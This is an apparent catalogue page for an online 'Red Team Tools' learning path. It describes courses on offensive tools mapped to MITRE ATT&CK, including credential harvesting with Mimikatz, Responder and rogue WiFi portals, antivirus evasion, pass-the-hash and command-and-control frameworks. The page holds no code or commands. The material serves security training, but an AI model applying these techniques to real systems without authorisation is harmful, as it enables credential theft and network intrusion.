Red Team Tools

Paths

Red Team Tools

Authors: Aaron Rosenmund, Matt Glass, Ricardo Reimao, Lee Allen, Dawid Czagan, Rishalin Pillay, Guillaume Ross

MITRE ATT&CK® is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. The ATT&CK knowledge base is used as a

  • Technical Information Gathering
  • Technical Weakness Identification
  • Build Capabilities
The ATT&CK section outlines tools used to achieve the following outcomes:
  • Initial Access
  • Execution
  • Persistence
  • Privilege Escalation
  • Defense Evasion
  • Credential Access
  • Discovery
  • Lateral Movement
  • Collection
  • Command and Control
  • Exfiltration
  • Impact
... Read more

What you will learn

  • What the tool is and does
  • Where to get it
  • Why I want to use it

Pre-requisites

  • Security fundementals
  • Understanding the concepts of security testing

Introduction

The first course in this series discusses leveraging the MITRE ATT&CK framework in combination with open source tools in the red team tools path to emulate adversary attacks.

Red Team Tools for Emulated Adversary Techniques with MITRE ATT&CK

by Aaron Rosenmund

Apr 30, 2020 / 17m

17m

Start Course
Description

Resources and time are limited and validation of security operations capabilities and defenses is elusive if not non-existent. Red team operations of all different shapes and sizes fill in this gap, but where do you start? In this course, Red Team Tools for Emulated Adversary Techniques with MITRE ATT&CK, you will gain the ability to prioritize and emulate techniques based on threat groups with the capability and intent to threaten your organization. First, you will learn about the different implementation of red team expertise within organizations. Next, you will discover the relationship between the tools and APT MITRE ATT&CK techniques Finally, you will explore how to operationalize adversary threat intelligence with ATT&CK Navigator. When you are finished with this course, you will have the skills and knowledge of red team tools for emulated adversary techniques with MITRE ATT&Ck needed to leverage the red team tools path to emulate threats and validate your organization's security operations.

Table of contents
  1. Course Overview
  2. Red Team Tools for Emulated Adversary Techniques with MITRE ATT&CK
  3. Resources

PRE-ATT&CK - Build Capabilities (TA0024)

Building capabilities consists of developing and/or acquiring the software, data and techniques used at different phases of an operation. This is the process of identifying development requirements and implementing solutions such as malware, delivery mechanisms, obfuscation/cryptographic protections, and call back and O&M functions.

Privilege Escalation and Client Execution with MSFVenom

by Matt Glass

Jan 21, 2020 / 24m

24m

Start Course
Description

Would you like to learn how to use a tool that can generate payloads for you? In this course, Privilege Escalation and Client Execution with MSFVenom, you will gain the ability to generate a variety of shell code payloads to fit your exploit, target, and situation. First, you will learn how to generate a payload within a standalone executable. Next, you will discover options within MSFVenom to change the payload capabilities. Finally, you will explore how to generate a payload for use in an existing exploit. When you are finished with this course, you will have the skills and knowledge of payload generation with MSFVenom needed to exploit vulnerabilities.

Table of contents
  1. Tool Introduction
  2. Privilege Escalation and Client Execution
  3. Resources

ATT&CK - Initial Access (TA0001)

Initial Access consists of techniques that use various entry vectors to gain their initial foothold within a network. Techniques used to gain a foothold include targeted spear phishing and exploiting weaknesses on public-facing web servers. Footholds gained through initial access may allow for continued access, like valid accounts and use of external remote services, or may be limited-use due to changing passwords.

Initial Access with Aircrack-ng

by Ricardo Reimao

Feb 14, 2020 / 21m

21m

Start Course
Description

Exploiting wireless networks is one of the most effective ways to get access to the internal network of a company. It usually gives you the same level of access as regular employees at the office, and WiFi networks can usually be accessed from outside of the building. In this course, Initial Access with Aircrack-ng, we explore the Aircrack-ng WiFi security assessment tool. First, you will see how to identify potential target networks and exploit vulnerabilities in both WEP and WPA/WPA2 protocols. Then, you will learn how to crack the passwords for WEP networks and how to brute force credentials for networks. Finally, you will discover how to cause denial of service in the WiFi network, which can be a good distraction mechanism for a bigger attack. By the end of this course, you will be able to protect your networks with three important tactics from the Mittre Att&ck framework: WiFi Access Points (Initial Access - T1465), Brute Force (Credential Access - T1110), and Denial of Service (Impact - T1464).

Table of contents
  1. Tool Introduction
  2. WiFi Password Cracking with Aircrack-ng
  3. Resources

Initial Access with WiFi-Pumpkin

by Ricardo Reimao

Mar 20, 2020 / 22m

22m

Start Course
Description

Having valid credentials is one of the most effective ways of getting access to the internal network of a company. It gives you the same level of access of a target employee, which often includes VPN access to the internal network as well as several external systems. In this course, Initial Access with WiFi-Pumpkin, you will explore the WiFi-Pumpkin tool, which is a rogue access point framework developed by Marcos Bomfim from the P0cL4bs. First, you will learn how to create rogue access points that look exactly like the WiFi network of your target company. Then, you will see how to set up captive portals, so that when users try to login to your rogue access point, they will be prompted to type their domain credentials and you can harvest them to use in other attacks. Finally, you will discover how to set up a rogue access point, how to set up a fake captive portal, how to customize the login page, and how to harvest the credentials that were submitted. By the end of this course, you will know two important tactics from the MITRE ATT&CK framework: Rogue WiFi Access Points (T1465) and Valid Accounts (T1078).

Table of contents
  1. Course Overview
  2. Credential Harvesting with Fake Captive Portals
  3. Resources

ATT&CK - Credential Access (TA0006)

Credential access represents techniques that can be used by adversaries to obtain access to or control over passwords, tokens, cryptographic keys, or other values that could be used by an adversary to gain unauthorized access to resources. Credential access allows the adversary to assume the identity of an account, with all of that account's permissions on the system and network, and makes it harder for defenders to detect the adversary. With sufficient access within a network, an adversary can create accounts for later use within the environment.

Credential Access with THC Hydra

by Lee Allen

Jan 27, 2020 / 22m

22m

Start Course
Description

There's no way around it - people are going to use weak passwords. THC Hydra will help you identify these passwords so that you can then use the information towards Red or Blue Teaming efforts. In this course, Credential Access with THC Hydra, you will learn how to brute force network logins. First, you will see where THC Hydra fits into the kill chain and the Mitre ATT&CK framework. Next, you will discover how the flexibility of THC Hydra can assist you in cracking passwords for various network protocols. Finally, you will explore how to leverage the password cracking capabilities of THC Hydra towards your own penetration testing or password strength assessment activities. When you are finished with this course, you will have the skills and knowledge needed to efficiently use THC Hydra towards your password cracking efforts.

Table of contents
  1. Course Overview
  2. Password Cracking with THC Hydra
  3. Resources

Credential Access with Mimikatz

by Lee Allen

Mar 30, 2020 / 25m

25m

Start Course
Description

Would you like to be able to see clear text credentials stored in memory? How about harvesting clear text credentials stored in protected files? In this course, Credential Access with Mimikatz, you will learn how to leverage the advanced credential access capabilities of the open-source Mimikatz project towards post-exploitation activities. First, you will see how to harvest password hashes and clear text user names and passwords for active login sessions stored in system memory. Next, you will discover how Mimikatz can be used to open memory dumps from other systems for situations where you may not be able to run Mimikatz on the victim machine. Finally, you will explore how to obtain clear text usernames and passwords stored by browsers, changing domain user passwords on the fly, and capturing passwords to file. When you finished with this course, you will have the skills and knowledge of the open-source Mimikatz tool needed to emulate credential access techniques aligned with Mitre ATT&CK.

Table of contents
  1. Tool Introduction
  2. Credential Access and Persistence with Mimikatz
  3. Resources

Credential Access with Responder

by Ricardo Reimao

Apr 2, 2020 / 20m

20m

Start Course
Description

One of the main objectives on a red team engagement is to get access to several user accounts (lateral movement) as well as administrator accounts (privilege escalation). After getting initial access to the internal network, you can launch several attacks to harvest credentials. In this course, Credential Access with Responder, you will explore one of the most important tools for lateral movement and privilege escalation, the Responder tool - a LLMNR, NBT-NS, and MDNS poisoner developed by Laurent Gaffie. First, you will exploit vulnerabilities on the LLMNR protocol. Then, you will use NBT-NS and MDNS protocols to gather credentials of domain users. Finally, you will learn not only how to get NTLM hashes, but also how to crack them to get plain text passwords and how to use those hashes in pass-the-hash attacks. By the end of this course, you will know two important tactics from the Mitre Att&ck framework: LLMNR/NBT-NS Poisoning and Relay (T1171) and Network Sniffing (T1040).

Table of contents
  1. Course Overview
  2. LLMNR/NBT-NS Poisoning with Responder
  3. Resources

Credential Access with Hashcat

by Dawid Czagan

May 4, 2020 / 28m

28m

Start Course
Description

Red team members and penetration testers need to know how to crack passwords with different password cracking techniques. In this course, Credential Access with Hashcat, you will learn about Hashcat, the number one offline password cracker. First, you will see how to launch a dictionary attack using Hashcat. Next, you will discover how you can crack more passwords when you launch a dictionary attack with a rule. Then, you will learn how to launch a dictionary attack with a mask, also known as a hybrid attack). Finally, you will explore how to use Hashcat to crack password-protected PDF and DOCX files. By the end of this course, you will know how to use Hashcat to crack passwords with different password cracking techniques.

Table of contents
  1. Course Overview
  2. Password Cracking with Hashcat
  3. Resources

Credential Access with John the Ripper

by Rishalin Pillay

May 22, 2020 / 23m

23m

Start Course
Description

Performing password cracking is a common task performed in a red team engagement. Understanding how to use the tools can be a daunting task. In this course, Credential Access with John the Ripper, you will gain the ability to crack commonly used password hashes leveraging the highly customizable tool, John the Ripper. First, you will learn how to navigate the syntax of John and amp up your cracking capabilities by obtaining rich wordlists and permutating them. Next, you will discover how to perform password cracking of common operating systems such as Windows and Linux. Finally, you will explore how to use John within a Metasploit session, giving you the ability to perform password cracking during the exploitation phase. When you are finished with this course, you will have the skills and knowledge of John the Ripper needed to amplify your red team engagements when performing password cracking.

Table of contents
  1. Course Overview
  2. Credential Dumping and Brute Force Capabilities of John the Ripper
  3. Resources

ATT&CK - Defense Evasion (TA0005)

Defense Evasion consists of techniques that adversaries use to avoid detection throughout their compromise. Techniques used for defense evasion include uninstalling/disabling security software or obfuscating/encrypting data and scripts. Adversaries also leverage and abuse trusted processes to hide and masquerade their malware. Other tactics’ techniques are cross-listed here when those techniques include the added benefit of subverting defenses.

Defense Evasion with Invoke-Obfuscation

by Ricardo Reimao

Apr 10, 2020 / 24m

24m

Start Course
Description

One of the main objectives of a red team engagement is to not get caught by the client detection mechanisms. If you simply run your malicious code in a production server, you will most likely get caught by the Windows defender or the anti-virus solution. For this reason, obfuscating scripts to bypass those detection mechanisms is essential. In this course, Detection Evasion with Invoke-Obfuscation, you will explore how to bypass detection tools such as anti-virus solutions by obfuscating your malicious scripts. First, you will learn what script obfuscation is and how you can use it in your red team engagement. Then, you will see how to install the tool in Kali Linux. Finally, you will explore how to use the Invoke-Obfuscation tool to bypass the anti-virus and run a malicious payload in a fully patched Windows server. By the end of this course, you will know how to use the Invoke-Obfuscation PowerShell tool to obfuscate other PowerShell scripts, with the intent of evading detection. This course covers two important tactics from the Mitre Att&ck framework: Obfuscated Files or Information (T1027) and Deobfuscate/Decode Files or Information (T1140).

Table of contents
  1. Course Overview
  2. Bypassing Anti-virus Detection with Invoke-Obfuscation
  3. Resources

ATT&CK - Discovery (TA0007)

Discovery consists of techniques an adversary may use to gain knowledge about the system and internal network. These techniques help adversaries observe the environment and orient themselves before deciding how to act. They also allow adversaries to explore what they can control and what’s around their entry point in order to discover how it could benefit their current objective. Native operating system tools are often used toward this post-compromise information-gathering objective.

Discovery with BloodHound

by Guillaume Ross

Apr 20, 2020 / 21m

21m

Start Course
Description

Understanding the relationship between thousands of Active Directory objects can be difficult. Users are members of groups, which can be nested in other groups, and linked to thousands of permissions. In this course, Discovery with BloodHound, you will gain the ability to use BloodHound to quickly find the shortest path to compromise systems in an Active Directory environment. First, you will learn how to install BloodHound. Next, you will discover how to use SharpHound to gather data from AD. Finally, you will explore how to ingest and visualize that data, finding paths between objects and the ultimate goal, Domain Admin access. When you are finished with this course, you will have the skills and knowledge of BloodHound needed to start using it to attack AD, or to understand how to better defend it.

Table of contents
  1. Course Overview
  2. Discovering the Path to Domain Admin with BloodHound
  3. Resources

Discovery with ADRecon

by Ricardo Reimao

Apr 23, 2020 / 22m

22m

Start Course
Description

The Active Directory of a company is a valuable source of information for a red team specialist. In there, you can find information about the users, computers, and even security policies. In this course, Discovery with ADRecon, you will learn about ADRecon, developed by Prashant Mahajan, which enables red team specialists to generate interesting reports from the Active Directory of a target company. First, you will discover the importance of the Active Directory data in a red team engagement and how this data can help you in further attacks. Then, you will see how to use ADRecon tool to extract data from your client’s Active Directory and generate a complete report about the environment. Finally, you will explore how to perform a Kerberoast attack using the ADRecon tool, in which you will gather hashed credentials from the Active Directory and crack them using Hashcat. When you are finished with this course, you will have the skills and knowledge to extract valuable information from the AD and plan your next attacks. This course covers five important tactics from the Mitre Att&ck Framework: Password Policy Discovery (T1201), Permission Groups Discovery (T1069), Account Discovery (T1087), Data from Information Repositories (T1213) and Kerberoasting (T1208).

Table of contents
  1. Course Overview
  2. Active Directory Enumeration
  3. Resources

ATT&CK - Lateral Movement (TA0008)

Lateral Movement consists of techniques that adversaries use to enter and control remote systems on a network. Following through on their primary objective often requires exploring the network to find their target and subsequently gaining access to it. Reaching their objective often involves pivoting through multiple systems and accounts to gain. Adversaries might install their own remote access tools to accomplish Lateral Movement or use legitimate credentials with native network and operating system tools, which may be stealthier.

Lateral Movement with PsExec

by Matt Glass

May 1, 2020 / 21m

21m

Start Course
Description

Would you like to learn how to execute commands, programs, and open command prompts or PowerShell sessions on remote Windows hosts? In this course, Lateral Movement with PsExec, you will gain the ability to use PsExec to laterally move throughout a Windows domain from a host you already exploited. First, you will learn how to use PsExec to run commands on remote Windows hosts. Next, you will discover how to leverage PsExec to run programs remotely. Finally, you will explore how to laterally move throughout a Windows domain using PsExec. When you are finished with this course, you will have the skills and knowledge of PsExec needed to leverage it for lateral movement in a Windows domain.

Table of contents
  1. Course Overview
  2. Lateral Movement with PsExec
  3. Resources

Lateral Movement with Mimikatz

by Lee Allen

May 1, 2020 / 28m

28m

Start Course
Description

Would you like to move from system to system without clear text credentials? How about impersonating a domain controller to inject data of your choosing? In this course, Lateral Movement with Mimikatz, you will learn how to leverage the advanced lateral movement capabilities of the open-source Mimikatz project towards post-exploitation activities. First, you will see how to 'Pass the Hash' to authenticate without the need of a clear text password. Next, you will discover how Mimikatz is used to bypass the domain controllers with 'Pass the Ticket'. Finally, you will explore how to create golden and silver tickets to impersonate domain users and service accounts. When finished with this course, you will have the skills and knowledge of the open-source Mimikatz tool needed to emulate lateral movement techniques aligned with Mitre ATT&CK.

Table of contents
  1. Tool Introduction
  2. Lateral Movement and Defense Evasion with Mimikatz
  3. Resources

ATT&CK - Command and Control (TA0011)

Command and Control consists of techniques that adversaries may use to communicate with systems under their control within a victim network. Adversaries commonly attempt to mimic normal, expected traffic to avoid detection. There are many ways an adversary can establish command and control with various levels of stealth depending on the victim’s network structure and defenses.

Command and Control with Covenant

by Aaron Rosenmund

Dec 31, 2019 / 19m

19m

Start Course
Description

Testing systems against advanced adversary techniques is required not just for red team operations but for targeted testing of defensive and detective measures on a network. Growing the skills to emulate the steadily advancing adversary capabilities within your team is a moving target that is complicated by the multitude of attack techniques available. In this course, Command, and Control with Covenant, you will gain the ability to leverage the advanced .NET, in-memory compilation techniques used by the open-source Covenant project to emulate adversary communication within an environment. First, you will learn to install the command and control infrastructure used to control compromised systems. Next, you will explore how to create and install implants called grunts to connect back to the adversary server. Finally, you will explore how to run tasks, gather information, and spread laterally within the Covenant C2 framework. When you are finished with this course, you will have the skills and knowledge of the Covenant command and control framework needed to emulate post-exploitation techniques aligned with Mitre ATT&CK.

Table of contents
  1. Tool Introduction
  2. Emulation Adversary C2 and Lateral Movement Operations with Covenant
  3. Resources

Command and Control with Pupy

by Matt Glass

Mar 5, 2020 / 25m

25m

Start Course
Description

Are you looking for a tool that can help you manage your target workstations after you exploited them? In this course, Command and Control with Pupy, you will gain the ability to manage target sessions, collect information, and run additional attacks from a single interface. First, you will learn how to generate client files in Pupy. Next, you will discover how to use different encryption protocols in Pupy. Finally, you will explore how to capture information from targets using Pupy. When you are finished with this course, you will have the skills and knowledge needed to manage exploited targets with Pupy.

Table of contents
  1. Tool Introduction
  2. Command and Control, Privilege Escalation, and Collection with Pupy
  3. Resources